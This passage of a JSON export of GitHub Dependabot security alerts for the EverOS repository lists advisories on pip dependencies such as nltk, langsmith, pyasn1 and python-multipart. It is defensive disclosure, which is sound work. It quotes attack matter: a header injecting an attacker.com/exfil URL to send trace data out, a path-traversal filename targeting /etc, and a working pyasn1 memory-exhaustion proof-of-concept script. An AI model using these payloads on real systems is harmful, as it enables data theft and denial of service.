Initiative)","severity":"medium","identifiers":[{"value":"GHSA-mhr3-j7m5-c7c9","type":"GHSA"},{"value":"CVE-2026-27794","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-mhr3-j7m5-c7c9"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27794"},{"url":"https://github.com/langchain-ai/langgraph/pull/6677"},{"url":"https://github.com/langchain-ai/langgraph/commit/f91d79d0c86932ded6e3b9f195d5a0bbd5aef99c"},{"url":"https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D4.0.0"},{"url":"https://github.com/advisories/GHSA-mhr3-j7m5-c7c9"}],"published_at":"2026-02-25T22:59:12Z","updated_at":"2026-02-25T22:59:14Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"severity":"medium","vulnerable_version_range":"< 4.0.0","first_patched_version":{"identifier":"4.0.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00366,"percentile":0.5857},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.6},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"severity":"medium","vulnerable_version_range":"< 
4.0.0","first_patched_version":{"identifier":"4.0.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/88","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/88","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":87,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-7p94-766c-hgjp","cve_id":"CVE-2025-14009","summary":"NLTK has a Zip Slip Vulnerability","description":"A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as __init__.py, these files are executed automatically upon import, leading to remote code execution. 
This issue can result in full system compromise, including file system access, network access, and potential persistence mechanisms.","severity":"critical","identifiers":[{"value":"GHSA-7p94-766c-hgjp","type":"GHSA"},{"value":"CVE-2025-14009","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-14009"},{"url":"https://huntr.com/bounties/49ecbc02-054e-4470-b2e0-b267936cc4e4"},{"url":"https://github.com/nltk/nltk/pull/3468"},{"url":"https://github.com/nltk/nltk/commit/1056b323af6462455571302e766b67cf300aea18"},{"url":"https://github.com/nltk/nltk/blob/4154eb85e832f266660a09286c7e37e308292284/ChangeLog#L1"},{"url":"https://github.com/advisories/GHSA-7p94-766c-hgjp"}],"published_at":"2026-02-18T18:30:40Z","updated_at":"2026-02-25T20:23:08Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"critical","vulnerable_version_range":"<= 3.9.2","first_patched_version":{"identifier":"3.9.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","score":10.0},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00878,"percentile":0.75402},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","score":10.0},"cwes":[{"cwe_id":"CWE-94","name":"Improper Control of Generation of Code ('Code Injection')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"critical","vulnerable_version_range":"<= 
3.9.2","first_patched_version":{"identifier":"3.9.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/87","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/87","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":86,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-2g6r-c272-w58r","cve_id":"CVE-2026-26013","summary":"LangChain affected by SSRF via image_url token counting in ChatOpenAI.get_num_tokens_from_messages","description":"## Server-Side Request Forgery (SSRF) in ChatOpenAI Image Token Counting\n\n### Summary\nThe `ChatOpenAI.get_num_tokens_from_messages()` method fetches arbitrary `image_url` values without validation when computing token counts for vision-enabled models. 
This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input.\n\n### Severity\n**Low** - The vulnerability allows SSRF attacks but has limited impact due to:\n- Responses are not returned to the attacker (blind SSRF)\n- Default 5-second timeout limits resource exhaustion\n- Non-image responses fail at PIL image parsing\n\n### Impact\nAn attacker who can control image URLs passed to `get_num_tokens_from_messages()` can:\n- Trigger HTTP requests from the application server to arbitrary internal or external URLs\n- Cause the server to access internal network resources (private IPs, cloud metadata endpoints)\n- Cause minor resource consumption through image downloads (bounded by timeout)\n\n**Note:** This vulnerability occurs during token counting, which may happen outside of model invocation (e.g., in logging, metrics, or token budgeting flows).\n\n### Details\nThe vulnerable code path:\n1. `get_num_tokens_from_messages()` processes messages containing `image_url` content blocks\n2. For images without `detail: \"low\"`, it calls `_url_to_size()` to fetch the image and compute token counts\n3. `_url_to_size()` performs `httpx.get(image_source)` on any URL without validation\n4. Prior to the patch, there was no SSRF protection, size limits, or explicit timeout\n\n**File:** `libs/partners/openai/langchain_openai/chat_models/base.py`\n\n### Patches\nThe vulnerability has been patched in `langchain-openai==1.1.9` (requires `langchain-core==1.2.11`).\n\nThe patch adds:\n1. **SSRF validation** using `langchain_core._security._ssrf_protection.validate_safe_url()` to block:\n - Private IP ranges (RFC 1918, loopback, link-local)\n - Cloud metadata endpoints (169.254.169.254, etc.)\n - Invalid URL schemes\n2. **Explicit size limits** (50 MB maximum, matching OpenAI's payload limit)\n3. **Explicit timeout** (5 seconds, same as `httpx.get` default)\n4. 
**Allow disabling image fetching** via `allow_fetching_images=False` parameter\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n1. **Sanitize input:** Validate and filter `image_url` values before passing messages to token counting or model invocation\n2. **Use network controls:** Implement egress filtering to prevent outbound requests to private IPs","severity":"low","identifiers":[{"value":"GHSA-2g6r-c272-w58r","type":"GHSA"},{"value":"CVE-2026-26013","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-2g6r-c272-w58r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26013"},{"url":"https://github.com/langchain-ai/langchain/commit/2b4b1dc29a833d4053deba4c2b77a3848c834565"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.11"},{"url":"https://github.com/advisories/GHSA-2g6r-c272-w58r"}],"published_at":"2026-02-11T14:23:13Z","updated_at":"2026-02-11T14:23:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"low","vulnerable_version_range":"< 1.2.11","first_patched_version":{"identifier":"1.2.11"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","score":3.7},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.0505},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","score":3.7},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"low","vulnerable_version_range":"< 
1.2.11","first_patched_version":{"identifier":"1.2.11"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/86","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/86","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":85,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"cryptography"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-r6ph-v2qm-q3c2","cve_id":"CVE-2026-26007","summary":"cryptography Vulnerable to a Subgroup Attack Due to Missing Subgroup Validation for SECT Curves","description":"## Vulnerability Summary\n\nThe `public_key_from_numbers` (or `EllipticCurvePublicNumbers.public_key()`), `EllipticCurvePublicNumbers.public_key()`, `load_der_public_key()` and `load_pem_public_key()` functions do not verify that the point belongs to the expected prime-order subgroup of the curve.\n\nThis missing validation allows an attacker to provide a public key point `P` from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as `S = [victim_private_key]P` via ECDH, this leaks information about `victim_private_key mod (small_subgroup_order)`. For curves with cofactor > 1, this reveals the least significant bits of the private key. 
When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup.\n\nOnly SECT curves are impacted by this.\n\n## Credit\n\nThis vulnerability was discovered by:\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine","severity":"high","identifiers":[{"value":"GHSA-r6ph-v2qm-q3c2","type":"GHSA"},{"value":"CVE-2026-26007","type":"CVE"}],"references":[{"url":"https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"},{"url":"https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"},{"url":"https://github.com/pyca/cryptography/releases/tag/46.0.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26007"},{"url":"http://www.openwall.com/lists/oss-security/2026/02/10/4"},{"url":"https://github.com/advisories/GHSA-r6ph-v2qm-q3c2"}],"published_at":"2026-02-10T21:27:06Z","updated_at":"2026-02-13T08:47:30Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"high","vulnerable_version_range":"<= 46.0.4","first_patched_version":{"identifier":"46.0.5"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","score":8.2}},"epss":{"percentage":9.0e-05,"percentile":0.00867},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-345","name":"Insufficient Verification of Data Authenticity"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"high","vulnerable_version_range":"<= 
46.0.4","first_patched_version":{"identifier":"46.0.5"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/85","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/85","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":84,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langsmith"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-v34v-rq6j-cj6p","cve_id":"CVE-2026-25528","summary":"LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection","description":"## Summary\n\nThe LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.\n\n---\n\n## Description\n\nWhen using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in Typescript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.\n\nPrior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.\n\n---\n\n## Attack Vector\n\n1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header:\n ```\n baggage: langsmith-replicas=[{\"api_url\":\"https://attacker.com/exfil\",\"project_name\":\"x\"}]\n ```\n\n2. The service parses the header via `RunTree.from_headers()`, storing the attacker's URL\n\n3. 
When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`\n\n---\n\n## Impact\n\n- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers\n- **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services\n\n---\n\n## Affected Use Cases\n\nApplications are vulnerable if they:\n- Use `TracingMiddleware` to automatically propagate tracing context\n- Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers\n\n---\n\n## Remediation\n\nUpdate to the patched versions:\n- **Python:** `pip install langsmith>=0.6.3`\n- **JavaScript:** `npm install langsmith@>=0.4.6`\n\nThe fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.\n\n---\n\n## Workarounds\n\nIf unable to upgrade immediately:\n- Strip or validate the `baggage` header before passing to `from_headers()`\n- Do not use `TracingMiddleware` with untrusted traffic","severity":"medium","identifiers":[{"value":"GHSA-v34v-rq6j-cj6p","type":"GHSA"},{"value":"CVE-2026-25528","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-v34v-rq6j-cj6p"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25528"},{"url":"https://github.com/advisories/GHSA-v34v-rq6j-cj6p"}],"published_at":"2026-02-09T20:36:59Z","updated_at":"2026-02-09T22:39:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.4.10, < 0.6.3","first_patched_version":{"identifier":"0.6.3"}},{"package":{"ecosystem":"npm","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.3.41, < 
0.4.6","first_patched_version":{"identifier":"0.4.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","score":5.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00014,"percentile":0.02521},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","score":5.8},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.4.10, < 0.6.3","first_patched_version":{"identifier":"0.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/84","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/84","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":83,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"protobuf"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-7gcm-g887-7qv7","cve_id":"CVE-2026-0994","summary":"protobuf affected by a JSON recursion depth bypass","description":"A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a 
RecursionError.","severity":"high","identifiers":[{"value":"GHSA-7gcm-g887-7qv7","type":"GHSA"},{"value":"CVE-2026-0994","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0994"},{"url":"https://github.com/protocolbuffers/protobuf/pull/25239"},{"url":"https://github.com/protocolbuffers/protobuf/issues/25070"},{"url":"https://github.com/protocolbuffers/protobuf/commit/d2b001626d137c62dfee6c88c87324102531868b"},{"url":"https://github.com/protocolbuffers/protobuf/commit/5ebddcb1bcbe51d1fe323baa145e85f4f23128cf"},{"url":"https://github.com/advisories/GHSA-7gcm-g887-7qv7"}],"published_at":"2026-01-23T15:31:35Z","updated_at":"2026-02-05T15:47:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":">= 6.30.0rc1, <= 6.33.4","first_patched_version":{"identifier":"6.33.5"}},{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":"< 5.29.6","first_patched_version":{"identifier":"5.29.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L","score":8.2}},"epss":{"percentage":0.00013,"percentile":0.02136},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":"< 
5.29.6","first_patched_version":{"identifier":"5.29.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/83","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/83","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":82,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-wp53-j4wj-2cfg","cve_id":"CVE-2026-24486","summary":"Python-Multipart has Arbitrary File Write via Non-Default Configuration","description":"### Summary\n\nA Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename.\n\n### Details\n\nWhen `UPLOAD_DIR` is set and `UPLOAD_KEEP_FILENAME` is `True`, the library constructs the file path using `os.path.join(file_dir, fname)`. Due to the behavior of `os.path.join()`, if the filename begins with a `/`, all preceding path components are discarded:\n\n```py\nos.path.join(\"/upload/dir\", \"/etc/malicious\") == \"/etc/malicious\"\n```\n \nThis allows an attacker to bypass the intended upload directory and write files to arbitrary paths. \n \n#### Affected Configuration \n \nProjects are only affected if all of the following are true: \n- `UPLOAD_DIR` is set\n- `UPLOAD_KEEP_FILENAME` is set to True\n- The uploaded file exceeds `MAX_MEMORY_FILE_SIZE` (triggering a flush to disk)\n\nThe default configuration is not vulnerable. \n \n#### Impact \n \nArbitrary file write to attacker-controlled paths on the filesystem. 
\n \n#### Mitigation \n \nUpgrade to version 0.0.22, or avoid using `UPLOAD_KEEP_FILENAME=True` in project configurations.","severity":"high","identifiers":[{"value":"GHSA-wp53-j4wj-2cfg","type":"GHSA"},{"value":"CVE-2026-24486","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg"},{"url":"https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4"},{"url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.22"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24486"},{"url":"https://github.com/advisories/GHSA-wp53-j4wj-2cfg"}],"published_at":"2026-01-26T23:28:05Z","updated_at":"2026-01-29T03:24:54Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.22","first_patched_version":{"identifier":"0.0.22"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00958,"percentile":0.76549},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 
0.0.22","first_patched_version":{"identifier":"0.0.22"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/82","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/82","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":81,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"pyasn1"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-63vm-454h-vhhq","cve_id":"CVE-2026-23490","summary":"pyasn1 has a DoS vulnerability in decoder","description":"### Summary\n\nAfter reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.\n\n### Details\n\nThe integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496\n\n### PoC\n\nFor the DoS:\n```py\nimport pyasn1.codec.ber.decoder as decoder\nimport pyasn1.type.univ as univ\nimport sys\nimport resource\n\n# Deliberately set memory limit to display PoC\ntry:\n resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))\n print(\"[*] Memory limit set to 100MB\")\nexcept:\n print(\"[-] Could not set memory limit\")\n\n# Test with different payload sizes to find the DoS threshold\npayload_size_mb = int(sys.argv[1])\n\nprint(f\"[*] Testing with {payload_size_mb}MB payload...\")\n\npayload_size = payload_size_mb * 1024 * 1024\n# Create payload with continuation octets\n# Each 0x81 byte indicates continuation, causing bit shifting in decoder\npayload = b'\\x81' * payload_size + b'\\x00'\nlength = len(payload)\n\n# DER length encoding (supports up to 4GB)\nif length < 128:\n length_bytes = 
bytes([length])\nelif length < 256:\n length_bytes = b'\\x81' + length.to_bytes(1, 'big')\nelif length < 256**2:\n length_bytes = b'\\x82' + length.to_bytes(2, 'big')\nelif length < 256**3:\n length_bytes = b'\\x83' + length.to_bytes(3, 'big')\nelse:\n # 4 bytes can handle up to 4GB\n length_bytes = b'\\x84' + length.to_bytes(4, 'big')\n\n# Use OID (0x06) for more aggressive parsing\nmalicious_packet = b'\\x06' + length_bytes + payload\n\nprint(f\"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB\")\n\ntry:\n print(\"[*] Decoding (this may take time or exhaust memory)...\")\n result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())\n\n print(f'[+] Decoded successfully')\n print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')\n\n # Try to convert to string\n print('[*] Converting to string...')\n try:\n str_result = str(result[0])\n print(f'[+] String succeeded: {len(str_result)} chars')\n if len(str_result) > 10000:\n print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')\n except MemoryError:\n print(f'[-] MemoryError during string conversion!')\n except Exception as e:\n print(f'[-] {type(e).__name__} during string conversion')\n\nexcept MemoryError:\n print('[-] MemoryError: Out of memory!')\nexcept Exception as e:\n print(f'[-] Error: {type(e).__name__}: {e}')\n\n\nprint(\"\\n[*] Test completed\")\n```\n\n\nScreenshots with the results:\n\n#### DoS\n\"Screenshot_20251219_160840\"\n\n\"Screenshot_20251219_152815\"\n\n#### Leak analysis\n\nA potential heap leak was investigated but came back clean:\n```\n[*] Creating 1000KB payload...\n[*] Decoding with pyasn1...\n[*] Materializing to string...\n[+] Decoded 2157784 characters\n[+] Binary representation: 896001 bytes\n[+] Dumped to heap_dump.bin\n\n[*] First 64 bytes (hex):\n 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081\n\n[*] First 64 bytes (ASCII/hex dump):\n 0000: 01 02 04 08 10 
20 40 81 02 04 08 10 20 40 81 02 ..... @..... @..\n 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @..... @....\n 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @..... @..... \n 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @..... @..... @.\n\n[*] Digit distribution analysis:\n '0': 10.1%\n '1': 9.9%\n '2': 10.0%\n '3': 9.9%\n '4': 9.9%\n '5': 10.0%\n '6': 10.0%\n '7': 10.0%\n '8': 9.9%\n '9': 10.1%\n```\n\n### Scenario\n\n1. An attacker creates a malicious X.509 certificate.\n2. The application validates certificates.\n3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.\n\n### Impact\n\nThis issue can affect resource consumption and hang systems or stop services.\nThis may affect:\n- LDAP servers\n- TLS/SSL endpoints\n- OCSP responders\n- etc.\n\n### Recommendation\n\nAdd a limit to the allowed bytes in the decoder.","severity":"high","identifiers":[{"value":"GHSA-63vm-454h-vhhq","type":"GHSA"},{"value":"CVE-2026-23490","type":"CVE"}],"references":[{"url":"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq"},{"url":"https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6"},{"url":"https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496"},{"url":"https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23490"},{"url":"https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970"},{"url":"https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html"},{"url":"https://github.com/advisories/GHSA-63vm-454h-vhhq"}],"published_at":"2026-01-16T19:19:25Z","updated_at":"2026-02-01T18:30:16Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"= 
0.6.1","first_patched_version":{"identifier":"0.6.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00021,"percentile":0.05578},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"= 0.6.1","first_patched_version":{"identifier":"0.6.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/81","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/81","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":80,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"virtualenv"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-597g-3phw-6986","cve_id":"CVE-2026-22702","summary":"virtualenv Has TOCTOU Vulnerabilities in Directory Creation","description":"## Impact\n\nTOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in `virtualenv` allow local attackers to perform symlink-based attacks on directory creation operations. 
